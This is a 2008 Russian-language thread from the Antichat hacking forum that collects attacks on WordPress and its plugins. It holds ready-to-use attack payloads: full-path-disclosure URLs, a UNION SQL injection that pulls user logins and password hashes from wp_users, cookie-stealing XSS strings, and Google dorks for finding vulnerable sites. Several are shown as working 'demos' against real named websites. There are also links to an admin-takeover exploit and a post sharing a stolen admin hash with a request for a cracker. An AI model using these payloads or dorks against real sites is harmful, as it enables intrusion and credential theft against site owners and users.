ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в FireStats для WordPress
  #71  
Старый 03.08.2008, 20:56
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию Уязвимости в FireStats для WordPress

Full path disclosure:
Код:
http://site/wp-content/plugins/firestats/js/firestats.js.php
http://site/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1
http://site/wp-content/plugins/firestats/php/footer.php
http://site/wp-content/plugins/firestats/php/page-help.php
http://site/wp-content/plugins/firestats/php/page-import.php
http://site/wp-content/plugins/firestats/php/page-settings.php
http://site/wp-content/plugins/firestats/php/page-stats.php
http://site/wp-content/plugins/firestats/php/tabbed-pane.php
http://site/wp-content/plugins/firestats/php/ezsql/mysql/demo.php
http://site/wp-content/plugins/firestats/php/ezsql/mysql/disk_cache_example.php
http://site/wp-content/plugins/firestats/php/ip2c/benchmark.php
http://site/wp-content/plugins/firestats/php/ip2c/ip2c_test.php
http://site/wp-content/plugins/firestats/php/unzip/sample.php
Активная ХSS
В поле UserAgent заголов UA отображается без предворительной фильтрации
 
Ответить с цитированием

  #72  
Старый 18.08.2008, 01:23
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

| Wordpress Plugin downloadMonitor (id) Remote SQL Injection Vulnerability

Код:
http://localhost/wp-content/plugins/wp-downloadMonitor/download.php?id=-14/**/union/**/select/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,5,6/**/from+wp_users--
Author: JIKO

Demo:

Код:
humanum.nl/wp-content/plugins/wp-downloadMonitor/download.php?id=-14/**/union/**/select/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,5,6/**/from+wp_users--
 
Ответить с цитированием

Эксплоит для смены пароля администратора
  #73  
Старый 29.08.2008, 20:57
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию Эксплоит для смены пароля администратора

 
Ответить с цитированием

WordPress Simple Tagging Widget suffers from a cross site scripting vulnerability
  #74  
Старый 05.09.2008, 23:08
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию WordPress Simple Tagging Widget suffers from a cross site scripting vulnerability

Код:
#################################################################################################
#
# WordPress Simple Tagging Widget Cross Site Scripting Vulnerability (XSS)
#
# Script: http://wordpress.org/extend/plugins/simple-tagging-widget/
#
#################################################################################################
#
# Author : kernel_panic
#
# Site : www.codebomb.org
#
# Mail : kernel_panic@codebomb.org
#
#################################################################################################
#
# DORK  : Try to find your own using Google. The vulnerable sites
# are: www.site.com/?tag=[XSS] or www.site.com/folder/?tag=[XSS]
#
#################################################################################################
EXAMPLE:
http://site.com/?tag=[XSS]
 
e.g.: [XSS]: <script>alert(/XSS/)</script> or try to use others
in order to work
 
POC:
http://www.wiggler.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E
http://dialogos.pasok.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E
http://www.programacionweb.net/buscador/?tag=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
 
###################################################################################################
 
Ответить с цитированием

Wordpress Forum version 1.7.4 suffers from a cross site scripting vulnerability.
  #75  
Старый 05.09.2008, 23:09
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию Wordpress Forum version 1.7.4 suffers from a cross site scripting vulnerability.

Код:
################################################################ 
# 
# Author: FeDeReR and sinner_01 
# Home  : www.darkc0de.com & www.hacking.ge
# 
# Email : FeDeReR@avoe.ge & sinn3r01@gmail.com
# 
# Share the c0de! 
# 
################################################################ 
# 
# Xss
# 
# Soft.Site: http://www.wordpress.com/ 
# 
# Dork:Wordpress Forum 1.7.4
# 
# Dork 2:Fredrik Fahlstad. Version: 1.7.4.
# 
# Xss: http://site.com/path/?forumaction=search
#  
# Search: <script>alert(document.cookie)</script>
# 
# Xss 2: http://site.com/path/?forumaction=showforum&forum=1
# 
# Post a new topic and type: <script>alert(document.cookie)</script>
# 
# 
# 
# 
# 
################################################################
 
Ответить с цитированием

WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
  #76  
Старый 08.09.2008, 11:13
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

Код:
in this hack we can remote change admin password, if registration enabled
................ 
6. admin's password changed, but new password will be send to correct admin email ;/
Предваряя тысячу и один вопрос "какой же пароль админа?" - отвечаю - пасс админа вы не получите согласно пункту 6.
Западлостроение, не более.
Source:
http://www.milw0rm.com/exploits/6397

Последний раз редактировалось Elekt; 08.09.2008 в 20:25..
 
Ответить с цитированием

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit
  #77  
Старый 10.09.2008, 20:21
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

http://www.milw0rm.com/exploits/6421
 
Ответить с цитированием

  #78  
Старый 12.09.2008, 07:21
Аватар для skivan
skivan
Новичок
Регистрация: 07.09.2006
Сообщений: 15
Провел на форуме:
171519

Репутация: 21
По умолчанию

А где взять файл createtables.php для генерации таблиц ? Гуглил, но не удачно...
 
Ответить с цитированием

  #79  
Старый 12.09.2008, 10:23
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Сорри что может не в тему, но у мну такой вопрос - достал адм. пасс(версия движка 2.6.2), он вот в таком виде:
admin:$P$Byn1t0aJv0ceUbWNBKQ6Z7GOOYd.Qq1
полазив по тикитам wp я так понял что там идет дополнительное хеширование md5() хеша, еще и с сальтом, есть ли какой нибудь брутер под данный вид хешей?
 
Ответить с цитированием

  #80  
Старый 13.09.2008, 05:02
Аватар для M4g
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673

Репутация: 784
Отправить сообщение для M4g с помощью ICQ
По умолчанию

>А где взять файл createtables.php для генерации таблиц ? Гуглил, но не удачно...
самому написать) но тут учти нюанс
надо 2 файла:
1. для пыха < 5.2.1
2. >=5.2.1
оба выйдут по 120 гиг в среднем
Дальше. Если радугу лень генерить, то жди работы сплойта. По моим подсчетам, ~10 часов для генерации сида)
---
ИМХО сплойт с такими раскладами бесполезен
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Сценарии/CMF/СMS 184 15.06.2010 11:10
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 42 07.05.2010 19:07
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Сценарии/CMF/СMS 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 E-Mail 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel E-Mail 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ